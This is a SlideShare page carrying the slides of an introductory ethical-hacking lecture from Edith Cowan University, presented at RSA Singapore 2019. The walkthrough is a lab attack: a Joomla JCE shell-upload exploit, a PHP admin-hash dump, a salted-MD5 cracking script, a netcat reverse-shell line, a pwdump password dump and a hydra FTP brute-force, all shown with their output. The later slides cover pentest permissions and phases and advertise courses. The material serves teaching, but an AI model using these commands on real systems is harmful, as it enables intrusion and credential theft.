KEMBAR78
Ethical hacking 101 - Singapore RSA 2019 | PPTX
PH
Uploaded byPaul Haskell-Dowland
PPTX, PDF347 views

Ethical hacking 101 - Singapore RSA 2019

The document outlines an introductory presentation on ethical hacking by Associate Professor Paul Haskell-Dowland, focusing on penetration testing techniques such as identifying vulnerabilities, exploiting weaknesses, and gaining remote access. It details various methodologies, tools, and phases involved in ethical hacking, emphasizing the importance of controlled evaluations and permissions. Additionally, it promotes educational courses in cyber security offered by Edith Cowan University, highlighting the development of new lab facilities and flexible study options.

Downloaded 16 times
Ethical Hacking 101
Associate Professor Paul Haskell-Dowland Associate Dean (Computing and Security) Edith Cowan University p.haskelldowland@ecu.edu.au @pdowland Welcome
Extreme Health Warning
• Identify vulnerable service (website) • Exploit vulnerabilities • Gain remote access • Escalate privileges • Probe internal network • Role of penetration testing Outline Source: https://commons.wikimedia.org/wiki/File:Cliche_Hacker_and_Binary_Code_(26946304530).jpg
• Identify the target • Scour the web • Specialist websites • Shodan • Ask people • Underground discussion forums • Social engineering Where do we start?
Identify vulnerable website https://pentest-tools.com/information-gathering/find-subdomains-of-domain
Target specific vulnerability • Having identified Joomla – now deploy a simple script… root@kali:~# perl jce.pl hack.me .::. Exploit for JCE Joomla Extension (Auto Shell Uploader) V0.1 .::. |||| Coded by: Mostafa Azizi (admin[@]0-Day[dot]net) |||| [*] Checking Exploitability ... [*] Trying to upload 0day.gif ... [*] Trying to change extension from .gif to .php ... [+] 0day.php was successfully uploaded [+] Path:hack.me/images/stories/0day.php?cmd=id
Upload further exploits
Examine CMS configuration files • Find blog config and get MySQL credentials /* Database Settings */ var $host = 'localhost'; var $user = 'root'; var $password = 'root'; var $db = 'blog'; var $dbprefix = 'jos_';
Retrieve a ‘super administrator’ account <?php $servername = "localhost"; $username = "root"; $password = "root"; $db="blog"; $conn = mysqli_connect($servername, $username, $password, $db); $sql = "SELECT * FROM jos_users where usertype='Super Administrator';"; $result = mysqli_query($conn, $sql); $row = mysqli_fetch_assoc($result); echo $row['username']; echo "<br/>"; echo $row['password']; mysqli_close($conn); ?>
Get blog admin password • Joomla uses a simple hashing mechanism: md5(password+salt) • E.g. md5($strLoginPassword."Ckbco8niuZ6ZR9lSnB80I8NtJki325j2") • Stored as hash:salt • Write a simple script with a password list  fdb3d81d39d925c1332559d2ea53823e: Ckbco8niuZ6ZR9lSnB80I8NtJki325j2
Crack MD5 hash (with salt) <?php $salt = "Ckbco8niuZ6ZR9lSnB80I8NtJki325j2"; $handle = fopen("top500.txt", "r"); while (($line = fgets($handle)) !== false) { $hash=md5(trim($line).$salt); echo "Trying: ".$hash."<br/>"; if ($hash=="fdb3d81d39d925c1332559d2ea53823e") echo "<b>Password is: ".$line."</b><br/>"; } fclose($handle); ?> 123456 password 12345678 1234 12345 dragon qwerty mustang letmein baseball master ...
Launch a remote shell • Use netcat • cryptcat also available
Escalate privileges ... @echo Dumping blog @"C:Program Files (x86)MySQLMySQL Server 5.5binmysqldump.exe" --user=%dbuser% --password=%dbpass% -- databases blog --log-error="C:Backupdumperrors.txt" > "C:Backupblog.%backupdate%.sql" START c:inetpubwwwrootimagesstoriesnc 10.0.2.1 80 -e cmd.exe
Get Windows passwords >pwdump7 Administrator:500:NO PASSWORD*********************:47443E24FE435EB5210D9FEF2847659D::: Guest:501:NO PASSWORD*********************:NO PASSWORD*********************::: hackme:1004:NO PASSWORD*********************:F1B94635FACC09D9FCC637A113DC10B1::: hackme2:1005:NO PASSWORD*********************:079F890A968B7F710A373ABB79EB11EB::: Pwdump v7.1 - raw password extractor Author: Andres Tarasco Acuna Took about 15mins Used two rainbow tables (238 and 239 passphrases) ~800 billion phrases FREE! http://ophcrack.sourceforge.net/
Scan internal network >nmap -sn 10.0.2.0/24 nmap -sn 10.0.2.0/24 Starting Nmap 7.01 ( https://nmap.org ) at 2017-05- 23 14:46 GMT Daylight Time Nmap scan report for 10.0.2.1 Host is up (0.013s latency). MAC Address: 08:00:27:98:38:DB (Oracle VirtualBox virtual NIC) Nmap scan report for 10.0.2.99 Host is up. Nmap done: 256 IP addresses (2 hosts up) scanned in 2.59 seconds >nmap 10.0.2.99 Starting Nmap 7.01 ( https://nmap.org ) Nmap scan report for 10.0.2.99 Host is up (0.00s latency). Not shown: 1084 closed ports PORT STATE SERVICE 21/tcp open ftp 80/tcp open http 139/tcp open netbios-ssn 443/tcp open https 445/tcp open microsoft-ds
Access FTP share >hydra -l hackme -P top500.txt ftp://10.0.2.99 hydra -l hackme -P top500.txt ftp://10.0.2.99 Hydra v8.1 (c) 2014 by van Hauser/THC - Please do not use in military or secret service organizations, or for illegal purposes. Hydra (http://www.thc.org/thc-hydra) starting at 2017-05-23 15:01:13 [DATA] max 16 tasks per 1 server, overall 64 tasks, 500 login tries (l:1/p:500), ~0 tries per task [DATA] attacking service ftp on port 21 [21][ftp] host: 10.0.2.99 login: hackme password: qwerty 1 of 1 target successfully completed, 1 valid password found Hydra (http://www.thc.org/thc-hydra) finished at 2017-05-23 15:01:13
So, why ethical hacking penetration testing?
• A controlled evaluation of vulnerabilities • Compromised on your terms • Rules of engagement • Permissions • Extent (how deep) • But can also be wide (subsidiaries, supply chain) • Agree up front the ‘what if’ scenarios • i.e. if the team get into the CEO’s email or the payroll system… • Privacy/ethics • What do you want from the process? • Reporting Considerations • Plan when the test will happen • Think about implications for systems • Will it be covert? • Will colleagues detect (or react to) the activity? • Careful of ‘automated penetration testing’ • Need a report you can action… • Think about the security of the pen test • Embarrassing if a pen tester is piggy- backed by a hacker • Think about any backdoors left open (physical and virtual)
Frameworks
• Phases • Penetration testing can be split into a number of ‘classic’ phases: Penetration Testing Phase 1 Reconnaissance 2 Scanning 3 Gaining access 4 Maintaining access 5 Covering tracks • A more ‘formal approach’ • Information Gathering • Information Analysis and Planning • Vulnerability Detection • Penetration • Attack/Privilege Escalation • Analysis and reporting • Clean-up
A pen-testers perspective Classic Phases
Reconnaissance • Simply gathering data • Doesn’t have to even involve a computer • Social engineering • Use the Internet to search for information • Google (and other engines) • The Internet Archive (way back machine) • Social media • The company’s own website!
Social engineering
Scanning • Target discovery • Enumerating services • Vulnerability mapping • Looking for countermeasures • Documenting as you go along
Scan tools
Gaining access • Exploiting discovered targets • Sniffing and cracking • Privilege escalation • Application execution and exploitation • Keylogging and log access
WiFi
Completing the process Maintaining access: • Use of backdoors • Think about security consequences • What if a ‘real’ hacker discovers your backdoor? • Document changes you make • Refer back to target brief • Exfiltration of data could be overt or covert Covering tracks: • Think about the ‘impression’ you leave behind on systems • Not just the ones you target • Remote logging • Firewall and IDS logs • Logging in transit systems Reporting: • Remember who the client is! • May need detailed and summary documentation • Executive summary • Should include recommendations • Must be actionable
Other tools
Useful links • https://www.virtualbox.org/ • https://www.kali.org/ • https://nmap.org/zenmap/ • http://ophcrack.sourceforge.net/ • https://www.wireshark.org/ • https://www.pathanalyzer.com/ • http://www.webextractor.com/ • https://www.shodan.io/ • https://pentest-tools.com/information-gathering/find-subdomains-of-domain
Want to know more?
• Bachelors courses: • Computer Science • Counter Terrorism Security and Intelligence • Cyber Security • Information Technology • Security • Honours • Computer Science • Information Technology • Security • Masters by Coursework • Computer Science • Cyber Security • Masters by Research • Computing and Security Computing & Security Courses
• ECU’s School of Science are developing new lab facilities to provide cutting edge laboratory environments for students in 2020. • We are building brand new facilities including: • $48m Science building • Superlabs • $2.5m Cyber 2.0 facility • New IT labs • Security Operations Centre New facilities
• All computing & security courses available fully online • New block-based delivery model is perfect for updating skills, re-training or career development (M.Cyber) • 20 credit units delivered in 6 week intensive blocks • Rotating carousel of units allowing flexibility to step on/off in line with work and family commitments Study online
• Study in Melbourne/Sydney • Graduate Certificate/Diploma of Cyber Security • Master of Cyber Security • Semester teaching model • Available full time only Study in Melbourne/Sydney
• Study in Singapore with ECU & PSB Academy • Bachelor of Science (Cyber Security) • Graduate Certificate of Cyber Security • Master of Cyber Security • Trimester teaching model (Bachelors) • Masters available in block-based sequential delivery (one module over 6 weeks) • Available full and part time Study in Singapore
Questions?
ECUWORLDREADY.COM.AU ECU Journey edithcowanuni edithcowanuniversity edithcowanuniversityschool/edith-cowan-university

More Related Content

PDF
Lateral Movement: How attackers quietly traverse your Network
byEC-Council
 
PPTX
Lateral Movement - Phreaknik 2016
byXavier Ashe
 
PPTX
Revealing the Attack Operations Targeting Japan by Shusei Tomonaga & Yuu Nak...
byCODE BLUE
 
PPTX
Injection flaw teaser
byNotSoSecure Global Services
 
PDF
Deeplook into apt and how to detect and defend v1.0
byMichael Gough
 
PDF
hackcon2013-Dirty Little Secrets They Didn't Teach You In Pentesting Class v2
byChris Gates
 
PDF
Detecting WMI Exploitation v1.1
byMichael Gough
 
PDF
BSidesOK_You_CAN_detect_PowerShell_attacks_v1.1
byMichael Gough
 
Lateral Movement: How attackers quietly traverse your Network
byEC-Council
 
Lateral Movement - Phreaknik 2016
byXavier Ashe
 
Revealing the Attack Operations Targeting Japan by Shusei Tomonaga & Yuu Nak...
byCODE BLUE
 
Injection flaw teaser
byNotSoSecure Global Services
 
Deeplook into apt and how to detect and defend v1.0
byMichael Gough
 
hackcon2013-Dirty Little Secrets They Didn't Teach You In Pentesting Class v2
byChris Gates
 
Detecting WMI Exploitation v1.1
byMichael Gough
 
BSidesOK_You_CAN_detect_PowerShell_attacks_v1.1
byMichael Gough
 

What's hot

PDF
You need a PROcess to catch running processes and their modules_v2.0
byMichael Gough
 
PDF
DIR ISF - Email keeps getting us pwned v1.1
byMichael Gough
 
PPTX
SANS @Night Talk: SQL Injection Exploited
byMicah Hoffman
 
PDF
Commodity malware means YOU
byMichael Gough
 
PDF
Sandbox vs manual malware analysis v1.1
byMichael Gough
 
PDF
Real life hacking101
byFlorent Batard
 
PPTX
Sticky Keys to the Kingdom
byDennis Maldonado
 
PDF
Windows Incident Response is hard, but doesn't have to be
byMichael Gough
 
PDF
EDR, ETDR, Next Gen AV is all the rage, so why am I ENRAGED?
byMichael Gough
 
PDF
Windows logging workshop - BSides Austin 2014
byMichael Gough
 
PDF
Logging for Hackers v1.0
byMichael Gough
 
PDF
Ask a Malware Archaeologist
byMichael Gough
 
PDF
InnoTech 2017_Defend_Against_Ransomware 3.0
byMichael Gough
 
PDF
What can you do about ransomware
byMichael Gough
 
PDF
Info sec is not daunting v1.0
byMichael Gough
 
PDF
Anatomy of a Cloud Hack
byNotSoSecure Global Services
 
PDF
Windows IR made easier and faster v1.0
byMichael Gough
 
PDF
Logging for Hackers - What you need to know to catch them
byMichael Gough
 
PDF
Logging for hackers SAINTCON
byMichael Gough
 
PDF
Proper logging can catch breaches like retail PoS
byMichael Gough
 
You need a PROcess to catch running processes and their modules_v2.0
byMichael Gough
 
DIR ISF - Email keeps getting us pwned v1.1
byMichael Gough
 
SANS @Night Talk: SQL Injection Exploited
byMicah Hoffman
 
Commodity malware means YOU
byMichael Gough
 
Sandbox vs manual malware analysis v1.1
byMichael Gough
 
Real life hacking101
byFlorent Batard
 
Sticky Keys to the Kingdom
byDennis Maldonado
 
Windows Incident Response is hard, but doesn't have to be
byMichael Gough
 
EDR, ETDR, Next Gen AV is all the rage, so why am I ENRAGED?
byMichael Gough
 
Windows logging workshop - BSides Austin 2014
byMichael Gough
 
Logging for Hackers v1.0
byMichael Gough
 
Ask a Malware Archaeologist
byMichael Gough
 
InnoTech 2017_Defend_Against_Ransomware 3.0
byMichael Gough
 
What can you do about ransomware
byMichael Gough
 
Info sec is not daunting v1.0
byMichael Gough
 
Anatomy of a Cloud Hack
byNotSoSecure Global Services
 
Windows IR made easier and faster v1.0
byMichael Gough
 
Logging for Hackers - What you need to know to catch them
byMichael Gough
 
Logging for hackers SAINTCON
byMichael Gough
 
Proper logging can catch breaches like retail PoS
byMichael Gough
 

Similar to Ethical hacking 101 - Singapore RSA 2019

PDF
ethical Hack
byViggi Unbeaten
 
PDF
Wm4
byUmang Patel
 
PDF
Wm4
byUmang Patel
 
PDF
Ethical hacking
byKhairi Aiman
 
PDF
ISACA Ethical Hacking Presentation 10/2011
byXavier Mertens
 
PPTX
Hacking - penetration tools
byJenishChauhan4
 
PPTX
Ethical hacking
byRishabha Garg
 
PDF
Super1
byneelakanteswarreddy
 
PDF
Hack Attack! An Introduction to Penetration Testing
bySteve Phillips
 
PPTX
Offensive Security basics part 1
bywharpreet
 
PPTX
NETWORK PENETRATION TESTING
byEr Vivek Rana
 
DOCX
Hacking
bygvsai501
 
DOCX
Hacking
bygvsai501
 
PPTX
Inetsecurity.in Ethical Hacking presentation
byJoshua Prince
 
PPT
ETHICAL HACKING
bySweta Leena Panda
 
ODP
Ethical hacking ppt
byhimanshujoshi238
 
PPT
Hacking Presentation
byAnimesh Behera
 
PDF
Bar Camp 11 Oct09 Hacking
byBarcamp Kerala
 
PPTX
Hacking and Penetration Testing - a beginners guide
byPankaj Dubey
 
PPTX
Ethical Hacking & Network Security
byLokender Yadav
 
ethical Hack
byViggi Unbeaten
 
Wm4
byUmang Patel
 
Wm4
byUmang Patel
 
Ethical hacking
byKhairi Aiman
 
ISACA Ethical Hacking Presentation 10/2011
byXavier Mertens
 
Hacking - penetration tools
byJenishChauhan4
 
Ethical hacking
byRishabha Garg
 
Super1
byneelakanteswarreddy
 
Hack Attack! An Introduction to Penetration Testing
bySteve Phillips
 
Offensive Security basics part 1
bywharpreet
 
NETWORK PENETRATION TESTING
byEr Vivek Rana
 
Hacking
bygvsai501
 
Hacking
bygvsai501
 
Inetsecurity.in Ethical Hacking presentation
byJoshua Prince
 
ETHICAL HACKING
bySweta Leena Panda
 
Ethical hacking ppt
byhimanshujoshi238
 
Hacking Presentation
byAnimesh Behera
 
Bar Camp 11 Oct09 Hacking
byBarcamp Kerala
 
Hacking and Penetration Testing - a beginners guide
byPankaj Dubey
 
Ethical Hacking & Network Security
byLokender Yadav
 

Recently uploaded

PPTX
Session 6 Specialized AI Associate Series: The GenAI Experience in UiPath Doc...
byDianaGray10
 
PDF
Expert Python App Development Company for Modern Enterprises
bySynapseIndia
 
PPTX
Agentic AI Solutions and Services | Aeologic
byankitaeologic
 
PDF
The End of the Missed Call - How AI Recaptures Lost Leads and Secures ROI
byiovox
 
PDF
The Gory Details of a Full-Featured Userspace CPU Scheduler by Avi Kivity
byScyllaDB
 
PDF
How to Measure Microsoft 365 Copilot Success and Manage AI Risk: Advanced Str...
byNikki Chapple
 
PDF
A fool with a tool is still a fool - Plone Conference 2025
byAndreas Jung
 
PDF
A 4-Terminal Approach to Validating Charge Conservation in MOSFET Compact Models
byEalwan Lee
 
PDF
Using Copilot with Microsoft Office Apps
byDeb Walther
 
PPTX
UiPath Automation Suite Installation (Hands-On) [2/3]
bysuhanisingh58689
 
PDF
From Bots to Brains: Getting Started with Agentic Automation in UiPath
byUiPathCommunity
 
PDF
From Data Chaos to Copilot Confidence: A Step-by-Step Microsoft 365 Copilot R...
byNikki Chapple
 
PDF
Cassandra vs. ScyllaDB: Evolutionary Differences
byScyllaDB
 
PDF
APDCA Energy sustainability white paper.pdf
byflintglobalapac
 
PDF
Milvus Community Meetup SF (Oct 21, 2025)
byZilliz
 
PDF
Unlock This Brilliant App Freezur That Builds Brainrot Videos That Captivate ...
bySOFTTECHHUB
 
PDF
The invisible key: Securing the new attack vector of OAuth tokens
byGianluca Varisco
 
PDF
Netflix's Scalable Page Construction with Real-Time Impression History by Sau...
byScyllaDB
 
PDF
“Toward Hardware-agnostic ADAS Implementations for Software-defined Vehicles,...
byEdge AI and Vision Alliance
 
PDF
Morgenbooster: Navigating Ai Criticism with Systems Thinking
by1508 A/S
 
Session 6 Specialized AI Associate Series: The GenAI Experience in UiPath Doc...
byDianaGray10
 
Expert Python App Development Company for Modern Enterprises
bySynapseIndia
 
Agentic AI Solutions and Services | Aeologic
byankitaeologic
 
The End of the Missed Call - How AI Recaptures Lost Leads and Secures ROI
byiovox
 
The Gory Details of a Full-Featured Userspace CPU Scheduler by Avi Kivity
byScyllaDB
 
How to Measure Microsoft 365 Copilot Success and Manage AI Risk: Advanced Str...
byNikki Chapple
 
A fool with a tool is still a fool - Plone Conference 2025
byAndreas Jung
 
A 4-Terminal Approach to Validating Charge Conservation in MOSFET Compact Models
byEalwan Lee
 
Using Copilot with Microsoft Office Apps
byDeb Walther
 
UiPath Automation Suite Installation (Hands-On) [2/3]
bysuhanisingh58689
 
From Bots to Brains: Getting Started with Agentic Automation in UiPath
byUiPathCommunity
 
From Data Chaos to Copilot Confidence: A Step-by-Step Microsoft 365 Copilot R...
byNikki Chapple
 
Cassandra vs. ScyllaDB: Evolutionary Differences
byScyllaDB
 
APDCA Energy sustainability white paper.pdf
byflintglobalapac
 
Milvus Community Meetup SF (Oct 21, 2025)
byZilliz
 
Unlock This Brilliant App Freezur That Builds Brainrot Videos That Captivate ...
bySOFTTECHHUB
 
The invisible key: Securing the new attack vector of OAuth tokens
byGianluca Varisco
 
Netflix's Scalable Page Construction with Real-Time Impression History by Sau...
byScyllaDB
 
“Toward Hardware-agnostic ADAS Implementations for Software-defined Vehicles,...
byEdge AI and Vision Alliance
 
Morgenbooster: Navigating Ai Criticism with Systems Thinking
by1508 A/S
 

Ethical hacking 101 - Singapore RSA 2019

  • 1.
  • 2.
    Associate Professor PaulHaskell-Dowland Associate Dean (Computing and Security) Edith Cowan University p.haskelldowland@ecu.edu.au @pdowland Welcome
  • 3.
  • 4.
    • Identify vulnerableservice (website) • Exploit vulnerabilities • Gain remote access • Escalate privileges • Probe internal network • Role of penetration testing Outline Source: https://commons.wikimedia.org/wiki/File:Cliche_Hacker_and_Binary_Code_(26946304530).jpg
  • 5.
    • Identify thetarget • Scour the web • Specialist websites • Shodan • Ask people • Underground discussion forums • Social engineering Where do we start?
  • 6.
  • 7.
    Target specific vulnerability •Having identified Joomla – now deploy a simple script… root@kali:~# perl jce.pl hack.me .::. Exploit for JCE Joomla Extension (Auto Shell Uploader) V0.1 .::. |||| Coded by: Mostafa Azizi (admin[@]0-Day[dot]net) |||| [*] Checking Exploitability ... [*] Trying to upload 0day.gif ... [*] Trying to change extension from .gif to .php ... [+] 0day.php was successfully uploaded [+] Path:hack.me/images/stories/0day.php?cmd=id
  • 8.
  • 9.
    Examine CMS configurationfiles • Find blog config and get MySQL credentials /* Database Settings */ var $host = 'localhost'; var $user = 'root'; var $password = 'root'; var $db = 'blog'; var $dbprefix = 'jos_';
  • 10.
    Retrieve a ‘superadministrator’ account <?php $servername = "localhost"; $username = "root"; $password = "root"; $db="blog"; $conn = mysqli_connect($servername, $username, $password, $db); $sql = "SELECT * FROM jos_users where usertype='Super Administrator';"; $result = mysqli_query($conn, $sql); $row = mysqli_fetch_assoc($result); echo $row['username']; echo "<br/>"; echo $row['password']; mysqli_close($conn); ?>
  • 11.
    Get blog adminpassword • Joomla uses a simple hashing mechanism: md5(password+salt) • E.g. md5($strLoginPassword."Ckbco8niuZ6ZR9lSnB80I8NtJki325j2") • Stored as hash:salt • Write a simple script with a password list  fdb3d81d39d925c1332559d2ea53823e: Ckbco8niuZ6ZR9lSnB80I8NtJki325j2
  • 12.
    Crack MD5 hash(with salt) <?php $salt = "Ckbco8niuZ6ZR9lSnB80I8NtJki325j2"; $handle = fopen("top500.txt", "r"); while (($line = fgets($handle)) !== false) { $hash=md5(trim($line).$salt); echo "Trying: ".$hash."<br/>"; if ($hash=="fdb3d81d39d925c1332559d2ea53823e") echo "<b>Password is: ".$line."</b><br/>"; } fclose($handle); ?> 123456 password 12345678 1234 12345 dragon qwerty mustang letmein baseball master ...
  • 13.
    Launch a remoteshell • Use netcat • cryptcat also available
  • 14.
    Escalate privileges ... @echo Dumpingblog @"C:Program Files (x86)MySQLMySQL Server 5.5binmysqldump.exe" --user=%dbuser% --password=%dbpass% -- databases blog --log-error="C:Backupdumperrors.txt" > "C:Backupblog.%backupdate%.sql" START c:inetpubwwwrootimagesstoriesnc 10.0.2.1 80 -e cmd.exe
  • 15.
    Get Windows passwords >pwdump7 Administrator:500:NOPASSWORD*********************:47443E24FE435EB5210D9FEF2847659D::: Guest:501:NO PASSWORD*********************:NO PASSWORD*********************::: hackme:1004:NO PASSWORD*********************:F1B94635FACC09D9FCC637A113DC10B1::: hackme2:1005:NO PASSWORD*********************:079F890A968B7F710A373ABB79EB11EB::: Pwdump v7.1 - raw password extractor Author: Andres Tarasco Acuna Took about 15mins Used two rainbow tables (238 and 239 passphrases) ~800 billion phrases FREE! http://ophcrack.sourceforge.net/
  • 16.
    Scan internal network >nmap-sn 10.0.2.0/24 nmap -sn 10.0.2.0/24 Starting Nmap 7.01 ( https://nmap.org ) at 2017-05- 23 14:46 GMT Daylight Time Nmap scan report for 10.0.2.1 Host is up (0.013s latency). MAC Address: 08:00:27:98:38:DB (Oracle VirtualBox virtual NIC) Nmap scan report for 10.0.2.99 Host is up. Nmap done: 256 IP addresses (2 hosts up) scanned in 2.59 seconds >nmap 10.0.2.99 Starting Nmap 7.01 ( https://nmap.org ) Nmap scan report for 10.0.2.99 Host is up (0.00s latency). Not shown: 1084 closed ports PORT STATE SERVICE 21/tcp open ftp 80/tcp open http 139/tcp open netbios-ssn 443/tcp open https 445/tcp open microsoft-ds
  • 17.
    Access FTP share >hydra-l hackme -P top500.txt ftp://10.0.2.99 hydra -l hackme -P top500.txt ftp://10.0.2.99 Hydra v8.1 (c) 2014 by van Hauser/THC - Please do not use in military or secret service organizations, or for illegal purposes. Hydra (http://www.thc.org/thc-hydra) starting at 2017-05-23 15:01:13 [DATA] max 16 tasks per 1 server, overall 64 tasks, 500 login tries (l:1/p:500), ~0 tries per task [DATA] attacking service ftp on port 21 [21][ftp] host: 10.0.2.99 login: hackme password: qwerty 1 of 1 target successfully completed, 1 valid password found Hydra (http://www.thc.org/thc-hydra) finished at 2017-05-23 15:01:13
  • 18.
    So, why ethicalhacking penetration testing?
  • 19.
    • A controlledevaluation of vulnerabilities • Compromised on your terms • Rules of engagement • Permissions • Extent (how deep) • But can also be wide (subsidiaries, supply chain) • Agree up front the ‘what if’ scenarios • i.e. if the team get into the CEO’s email or the payroll system… • Privacy/ethics • What do you want from the process? • Reporting Considerations • Plan when the test will happen • Think about implications for systems • Will it be covert? • Will colleagues detect (or react to) the activity? • Careful of ‘automated penetration testing’ • Need a report you can action… • Think about the security of the pen test • Embarrassing if a pen tester is piggy- backed by a hacker • Think about any backdoors left open (physical and virtual)
  • 20.
  • 21.
    • Phases • Penetrationtesting can be split into a number of ‘classic’ phases: Penetration Testing Phase 1 Reconnaissance 2 Scanning 3 Gaining access 4 Maintaining access 5 Covering tracks • A more ‘formal approach’ • Information Gathering • Information Analysis and Planning • Vulnerability Detection • Penetration • Attack/Privilege Escalation • Analysis and reporting • Clean-up
  • 22.
  • 23.
    Reconnaissance • Simply gatheringdata • Doesn’t have to even involve a computer • Social engineering • Use the Internet to search for information • Google (and other engines) • The Internet Archive (way back machine) • Social media • The company’s own website!
  • 24.
  • 25.
    Scanning • Target discovery •Enumerating services • Vulnerability mapping • Looking for countermeasures • Documenting as you go along
  • 26.
  • 27.
    Gaining access • Exploitingdiscovered targets • Sniffing and cracking • Privilege escalation • Application execution and exploitation • Keylogging and log access
  • 28.
  • 29.
    Completing the process Maintainingaccess: • Use of backdoors • Think about security consequences • What if a ‘real’ hacker discovers your backdoor? • Document changes you make • Refer back to target brief • Exfiltration of data could be overt or covert Covering tracks: • Think about the ‘impression’ you leave behind on systems • Not just the ones you target • Remote logging • Firewall and IDS logs • Logging in transit systems Reporting: • Remember who the client is! • May need detailed and summary documentation • Executive summary • Should include recommendations • Must be actionable
  • 30.
  • 31.
    Useful links • https://www.virtualbox.org/ •https://www.kali.org/ • https://nmap.org/zenmap/ • http://ophcrack.sourceforge.net/ • https://www.wireshark.org/ • https://www.pathanalyzer.com/ • http://www.webextractor.com/ • https://www.shodan.io/ • https://pentest-tools.com/information-gathering/find-subdomains-of-domain
  • 32.
  • 33.
    • Bachelors courses: •Computer Science • Counter Terrorism Security and Intelligence • Cyber Security • Information Technology • Security • Honours • Computer Science • Information Technology • Security • Masters by Coursework • Computer Science • Cyber Security • Masters by Research • Computing and Security Computing & Security Courses
  • 34.
    • ECU’s Schoolof Science are developing new lab facilities to provide cutting edge laboratory environments for students in 2020. • We are building brand new facilities including: • $48m Science building • Superlabs • $2.5m Cyber 2.0 facility • New IT labs • Security Operations Centre New facilities
  • 35.
    • All computing& security courses available fully online • New block-based delivery model is perfect for updating skills, re-training or career development (M.Cyber) • 20 credit units delivered in 6 week intensive blocks • Rotating carousel of units allowing flexibility to step on/off in line with work and family commitments Study online
  • 36.
    • Study inMelbourne/Sydney • Graduate Certificate/Diploma of Cyber Security • Master of Cyber Security • Semester teaching model • Available full time only Study in Melbourne/Sydney
  • 37.
    • Study inSingapore with ECU & PSB Academy • Bachelor of Science (Cyber Security) • Graduate Certificate of Cyber Security • Master of Cyber Security • Trimester teaching model (Bachelors) • Masters available in block-based sequential delivery (one module over 6 weeks) • Available full and part time Study in Singapore
  • 38.
  • 39.
    ECUWORLDREADY.COM.AU ECU Journey edithcowanuniedithcowanuniversity edithcowanuniversityschool/edith-cowan-university